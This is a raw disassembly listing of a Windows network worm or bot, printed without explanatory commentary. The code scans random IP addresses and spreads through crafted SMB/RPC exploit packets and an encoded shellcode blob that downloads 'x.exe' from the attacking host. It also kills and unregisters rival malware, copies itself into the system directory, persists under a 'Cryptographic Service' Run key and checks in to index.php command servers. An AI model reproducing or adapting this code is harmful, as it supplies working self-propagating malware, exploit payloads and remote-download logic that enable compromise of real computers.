call esi ; rand
push offset dword_31425004
mov byte ptr [ebp+arg_0+3], al
call dword_314210D4 ; InterlockedIncrement
push [ebp+arg_0]
call sub_31421801
test eax, eax
pop ecx
jnz short loc_31422624
push [ebp+arg_0]
push offset sub_3142255F
call sub_31421F52
pop ecx
pop ecx
loc_31422624: ; CODE XREF: sub_314225C3+50�j
movzx edi, word_3142500C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_31421094 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_314225E1
loc_31422642: ; CODE XREF: sub_314225C3+25�j
; sub_314225C3+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_31422647: ; CODE XREF: sub_314225C3+C�j
pop ebp
retn 4
sub_314225C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142264B proc near ; DATA XREF: UPX0:3142281B�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_31421EFB
call sub_3142239E
test eax, eax
jnz loc_31422704
push ebx
mov ebx, dword_31421094
push esi
mov esi, dword_314210FC
push edi
loc_31422671: ; CODE XREF: sub_3142264B+48�j
; sub_3142264B+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_31422680: ; CODE XREF: sub_3142264B+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_31422680
call sub_31421FF9
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_31422671
call sub_31422038
test eax, eax
jz short loc_314226DC
push offset dword_31425004
call dword_314210D4 ; InterlockedIncrement
push edi
call sub_31421801
test eax, eax
pop ecx
jnz short loc_314226E3
push edi
push offset sub_3142255F
call sub_31421F52
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_314226C8: ; CODE XREF: sub_3142264B+8D�j
push edi
push offset sub_314225C3
call sub_31421F52
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_314226C8
jmp short loc_314226E3
; ---------------------------------------------------------------------------
loc_314226DC: ; CODE XREF: sub_3142264B+51�j
push 2710h
call ebx ; Sleep
loc_314226E3: ; CODE XREF: sub_3142264B+67�j
; sub_3142264B+8F�j
movzx edi, word_3142500C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_3142239E
test eax, eax
jz loc_31422671
pop edi
pop esi
pop ebx
loc_31422704: ; CODE XREF: sub_3142264B+11�j
push 0
call dword_314210D0 ; ExitThread
xor eax, eax
leave
retn 4
sub_3142264B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422712 proc near ; CODE XREF: UPX0:314227E0�p
; UPX0:loc_31422846�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_31421FF9
push eax
call dword_3142115C ; inet_ntoa
mov esi, dword_31421068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpy
push dword_31424FFC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3142111C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_314242BA
call esi ; lstrcpy
push offset byte_314242B8
call dword_31421084 ; lstrlen
mov byte_314242B8[eax], 0DFh
pop esi
leave
retn
sub_31422712 endp
; ---------------------------------------------------------------------------
loc_3142276E: ; DATA XREF: sub_314223B2+166�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31425004, ebx
call sub_31422038
mov esi, dword_31421094
mov edi, 1388h
test eax, eax
jnz short loc_3142279C
loc_31422790: ; CODE XREF: UPX0:3142279A�j
push edi
call esi ; Sleep
call sub_31422038
test eax, eax
jz short loc_31422790
loc_3142279C: ; CODE XREF: UPX0:3142278E�j
lea eax, [esp+14h]
push ebx
push eax
call dword_31421130 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_31425008, ebx
pop ebp
mov word_3142500C, 96h
jz short loc_314227D9
mov dword_31425008, 1
mov ebp, 15Eh
mov word_3142500C, 14h
loc_314227D9: ; CODE XREF: UPX0:314227BF�j
call sub_31421FF9
mov ebx, eax
call sub_31422712
cmp ebx, 100007Fh
jz short loc_314227FA
push ebx
push offset sub_3142255F
call sub_31421F52
pop ecx
pop ecx
loc_314227FA: ; CODE XREF: UPX0:314227EB�j
mov dword ptr [esp+10h], 4
loc_31422802: ; CODE XREF: UPX0:31422813�j
push ebx
push offset sub_314225C3
call sub_31421F52
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_31422802
test ebp, ebp
jle short loc_3142282A
loc_31422819: ; CODE XREF: UPX0:31422828�j
push 0
push offset sub_3142264B
call sub_31421F52
pop ecx
dec ebp
pop ecx
jnz short loc_31422819
loc_3142282A: ; CODE XREF: UPX0:31422817�j
; UPX0:31422836�j ...
call sub_31422038
test eax, eax
jz short loc_31422838
push edi
call esi ; Sleep
jmp short loc_3142282A
; ---------------------------------------------------------------------------
loc_31422838: ; CODE XREF: UPX0:31422831�j
; UPX0:31422844�j
call sub_31422038
test eax, eax
jnz short loc_31422846
push edi
call esi ; Sleep
jmp short loc_31422838
; ---------------------------------------------------------------------------
loc_31422846: ; CODE XREF: UPX0:3142283F�j
call sub_31422712
jmp short loc_3142282A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142284D proc near ; CODE XREF: sub_314229E6+93�p
; sub_31422B67+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3142100C ; RegOpenKeyExA
test eax, eax
jnz short loc_31422880
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31421010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31421014 ; RegCloseKey
loc_31422880: ; CODE XREF: sub_3142284D+1C�j
pop ebp
retn
sub_3142284D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422882 proc near ; CODE XREF: sub_314221C4+33�p
; sub_314229E6+84�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3142100C ; RegOpenKeyExA
test eax, eax
jz short loc_314228AE
push 1
pop eax
jmp short loc_314228D8
; ---------------------------------------------------------------------------
loc_314228AE: ; CODE XREF: sub_31422882+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31421008 ; RegQueryValueExA
test eax, eax
jz short loc_314228CD
push 2
pop esi
loc_314228CD: ; CODE XREF: sub_31422882+46�j
push [ebp+arg_10]
call dword_31421014 ; RegCloseKey
mov eax, esi
loc_314228D8: ; CODE XREF: sub_31422882+2A�j
pop esi
leave
retn
sub_31422882 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314228DB proc near ; CODE XREF: sub_31422A9B+96�p
; sub_31422B67+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421000 ; RegCreateKeyExA
test eax, eax
jz short loc_31422904
push 1
pop eax
jmp short loc_3142292B
; ---------------------------------------------------------------------------
loc_31422904: ; CODE XREF: sub_314228DB+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31421004 ; RegSetValueExA
test eax, eax
jz short loc_31422920
push 2
pop esi
loc_31422920: ; CODE XREF: sub_314228DB+40�j
push [ebp+arg_4]
call dword_31421014 ; RegCloseKey
mov eax, esi
loc_3142292B: ; CODE XREF: sub_314228DB+27�j
pop esi
pop ebp
retn
sub_314228DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142292E proc near ; CODE XREF: sub_314229E6+9F�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_31421084 ; lstrlen
mov esi, eax
dec esi
test esi, esi
jle loc_314229E2
loc_3142294E: ; CODE XREF: sub_3142292E+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31422957
dec esi
jns short loc_3142294E
loc_31422957: ; CODE XREF: sub_3142292E+24�j
push 0
push 2
call sub_31422D2C ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_314229E2
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31422D26 ; Process32First
test eax, eax
jz short loc_314229E2
lea esi, [esi+ebx+1]
loc_3142299F: ; CODE XREF: sub_3142292E+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31421104 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_314229CF
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_314210B0 ; OpenProcess
push 0
push eax
call dword_31421060 ; TerminateProcess
loc_314229CF: ; CODE XREF: sub_3142292E+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31422D20 ; Process32Next
test eax, eax
jnz short loc_3142299F
loc_314229E2: ; CODE XREF: sub_3142292E+1A�j
; sub_3142292E+38�j ...
pop esi
pop ebx
leave
retn
sub_3142292E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314229E6 proc near ; CODE XREF: UPX0:3142237B�p
var_13C = byte ptr -13Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
lea eax, [ebp+var_34]
push edi
mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_28], offset aBotLoader ; "Bot Loader"
mov [ebp+var_24], offset aSystray ; "SysTray"
mov [ebp+var_20], offset aWinupdate ; "WinUpdate"
mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Bh
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31422A56: ; CODE XREF: sub_314229E6+AE�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_13C]
push eax
push ebx
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jnz short loc_31422A8D
push ebx
push edi
push esi
call sub_3142284D
lea eax, [ebp+var_13C]
push eax
call sub_3142292E
add esp, 10h
loc_31422A8D: ; CODE XREF: sub_314229E6+8E�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31422A56
pop edi
pop esi
pop ebx
leave
retn
sub_314229E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422A9B proc near ; CODE XREF: sub_31422B67+D1�p
; sub_31422B67+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_31422AB0
push [ebp+arg_0]
call dword_31421074 ; DeleteFileA
loc_31422AB0: ; CODE XREF: sub_31422A9B+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_3142108C ; GetSystemDirectoryA
test eax, eax
jz locret_31422B65
push esi
call dword_314210FC ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31421F73
mov esi, dword_31421088
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_314241F0
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push offset dword_314241F8
push eax
call esi ; lstrcat
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31421050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_31421084 ; lstrlen
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_314228DB
add esp, 14h
push dword_31424FF4
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31421054 ; WinExec
push 1F4h
call dword_31421094 ; Sleep
push 0
call dword_314210E0 ; ExitProcess
pop esi
locret_31422B65: ; CODE XREF: sub_31422A9B+23�j
leave
retn
sub_31422A9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422B67 proc near ; CODE XREF: UPX0:31422380�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31421048 ; GetModuleFileNameA
test eax, eax
jz loc_31422CA0
and dword_31425010, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jz short loc_31422BED
call dword_314210FC ; rand
push 0Ah
mov ebx, offset aSqsfqbjdrkpbhb ; "sqsfqbjdrkpbhbxmjsw"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31421F73
pop ecx
pop ecx
push ebx
call dword_31421084 ; lstrlen
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_314228DB
add esp, 14h
jmp short loc_31422BFC
; ---------------------------------------------------------------------------
loc_31422BED: ; CODE XREF: sub_31422B67+4D�j
lea eax, [ebp+var_20]
push eax
push offset aSqsfqbjdrkpbhb ; "sqsfqbjdrkpbhbxmjsw"
call dword_31421068 ; lstrcpy
loc_31422BFC: ; CODE XREF: sub_31422B67+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_31422882
add esp, 14h
test eax, eax
jz short loc_31422C42
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_314228DB
lea eax, [ebp+var_84]
push eax
push 0
call sub_31422A9B
add esp, 1Ch
jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C42: ; CODE XREF: sub_31422B67+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3142104C ; lstrcmpi
test eax, eax
jnz short loc_31422C8B
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jnz short loc_31422CA0
push ebx
push edi
push esi
mov dword_31425010, 1
call sub_3142284D
add esp, 0Ch
jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C8B: ; CODE XREF: sub_31422B67+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_31422A9B
pop ecx
pop ecx
loc_31422CA0: ; CODE XREF: sub_31422B67+1F�j
; sub_31422B67+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31422B67 endp
; =============== S U B R O U T I N E =======================================
sub_31422CA5 proc near ; CODE XREF: sub_314211A0+CA�p
; sub_314215C7+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31421044 ; VirtualAlloc
retn
sub_31422CA5 endp
; =============== S U B R O U T I N E =======================================
sub_31422CB9 proc near ; CODE XREF: sub_314211A0+10B�p
; sub_314215C7+C0�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31421040 ; VirtualFree
retn
sub_31422CB9 endp
; ---------------------------------------------------------------------------
align 10h
loc_31422CD0: ; DATA XREF: sub_31421422+A�o
; sub_314223B2+A�o
jmp dword ptr loc_31421100
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CD6 proc near ; CODE XREF: sub_31421801+128�p
; sub_31421801+134�p ...
jmp dword_314210F8
sub_31422CD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CDC proc near ; CODE XREF: sub_31421801+9C�p
; sub_31421801+C5�p ...
jmp dword_314210F4
sub_31422CDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CE2 proc near ; CODE XREF: sub_31421801+93�p
; sub_31421801+B2�p ...
jmp dword_314210F0
sub_31422CE2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31422CF0 proc near ; CODE XREF: sub_31421801+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31422D10
loc_31422CFC: ; CODE XREF: sub_31422CF0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31422CFC
loc_31422D10: ; CODE XREF: sub_31422CF0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31422CF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D20 proc near ; CODE XREF: sub_3142292E+AB�p
jmp dword_31421064
sub_31422D20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D26 proc near ; CODE XREF: sub_3142292E+64�p
jmp dword_3142105C
sub_31422D26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D2C proc near ; CODE XREF: sub_3142292E+2D�p
jmp dword_31421058
sub_31422D2C endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 4B3h dup(0)
dword_31424000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_31421422+112�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314215C7+84�o
align 10h
byte_31424080 db 0 ; DATA XREF: sub_314216A2+1B�r
off_31424081 dd offset dword_314241E4 ; DATA XREF: sub_314216A2+23�r
align 2
dd offset dword_314241D4
dw 0C401h
dd 1314241h, 314241B4h, 4241A000h, 41900131h, 80013142h
dd 314241h, 31424174h, 42416800h, 41580131h, 48003142h
dd 1314241h, 3142413Ch, 42417400h, 41D40131h, 30003142h
dd 314241h, 314241D4h, 42412001h, 41480031h, 10013142h
dd 314241h, 31424130h, 42410001h, 40F80131h, 74003142h
dd 314241h, 31424130h, 2E767663h, 7572h, 2E777777h, 6C646572h
dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h
dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
dd 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dword_314241D4 dd 72617778h, 6A632E65h, 656E2E62h, 74h ; DATA XREF: UPX0:31424086�o
dword_314241E4 dd 617A616Dh, 616B6166h, 75722Eh ; DATA XREF: UPX0:off_31424081�o
dword_314241F0 dd 6578652Eh, 0 ; DATA XREF: sub_314211A0+75�o
; sub_3142207E+55�o ...
dword_314241F8 dd 5Ch ; DATA XREF: sub_314211A0+49�o
; sub_31422A9B+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314211A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31421316+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31421316+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_31421422+34�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_314215C7+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=19-2&cnt=%s',0
; DATA XREF: sub_314215C7+57�o
align 8
byte_314242B8 db 0EBh ; DATA XREF: sub_31421801+24E�o
; sub_31421801+260�o ...
db 58h
word_314242BA dw 7468h ; DATA XREF: sub_31422712+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_31424580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_31421801+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_3142460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_314246B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_31424798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_31421801+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_314247FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_31424868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_3142490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_3142498C dd 401495h, 3, 40707Ch, 1, 0 ; DATA XREF: sub_31421801+51C�o
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
